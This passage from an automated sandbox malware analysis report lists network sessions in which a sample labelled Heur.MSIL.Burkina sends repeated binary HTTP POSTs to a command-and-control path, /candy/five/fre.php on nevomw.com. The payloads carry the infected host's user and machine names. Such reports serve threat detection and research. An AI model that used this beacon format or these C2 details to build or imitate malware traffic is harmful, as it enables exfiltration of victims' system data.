                                            Dec 2, 2020 11:53:13.304941893 CET | 375 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:13.381217003 CET | 382 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:13 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            64 | 192.168.2.6 | 49783 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:13.692641020 CET | 411 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:13.746243000 CET | 422 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:13.819813967 CET | 434 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:13 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            65 | 192.168.2.6 | 49787 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:14.113854885 CET | 482 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:14.166322947 CET | 483 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:14.244582891 CET | 491 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:14 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            66 | 192.168.2.6 | 49789 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:14.503417969 CET | 555 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:14.555636883 CET | 556 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:14.657265902 CET | 565 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:14 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            67 | 192.168.2.6 | 49791 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:14.917886019 CET | 645 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:14.981981039 CET | 646 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:15.077527046 CET | 648 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:15 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            68 | 192.168.2.6 | 49793 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:15.377621889 CET | 833 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:15.432190895 CET | 833 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:15.504591942 CET | 835 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:15 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            69 | 192.168.2.6 | 49795 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:15.761208057 CET | 846 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:15.813211918 CET | 853 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:15.888012886 CET | 855 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:15 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            7 | 192.168.2.6 | 49720 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:52:44.817785978 CET | 69 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:52:44.872364044 CET | 74 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:52:44.947917938 CET | 77 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:44 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            70 | 192.168.2.6 | 49797 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:16.124828100 CET | 1052 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:16.177397966 CET | 1053 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:16.253380060 CET | 1056 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:16 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            71 | 192.168.2.6 | 49799 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:16.497787952 CET | 1094 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:16.550455093 CET | 1101 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:16.625170946 CET | 1121 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:16 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            72 | 192.168.2.6 | 49800 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:16.866136074 CET | 1144 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:16.918363094 CET | 1145 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:16.992594004 CET | 1152 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:16 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            73 | 192.168.2.6 | 49802 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:17.243861914 CET | 1185 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:17.297071934 CET | 1186 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:17.372365952 CET | 1186 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:17 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            74 | 192.168.2.6 | 49804 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:17.613940001 CET | 1194 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:17.666379929 CET | 1195 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:17.740863085 CET | 1199 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:17 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            75 | 192.168.2.6 | 49805 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:18.048964024 CET | 1201 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:18.101805925 CET | 1201 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:18.175754070 CET | 1202 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:18 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            76 | 192.168.2.6 | 49806 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:18.420409918 CET | 1203 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:18.475081921 CET | 1203 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:18.551269054 CET | 1203 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:18 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            77 | 192.168.2.6 | 49807 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:18.793375015 CET | 1204 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:18.845614910 CET | 1204 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:18.923599005 CET | 1205 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:18 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            78 | 192.168.2.6 | 49809 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:19.339299917 CET | 1211 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:19.393095016 CET | 1214 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:19.473929882 CET | 1214 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:19 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            79 | 192.168.2.6 | 49810 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:19.713181019 CET | 1219 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:19.767334938 CET | 1219 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:19.844413042 CET | 1219 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:19 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            8 | 192.168.2.6 | 49721 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:52:45.670062065 CET | 82 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
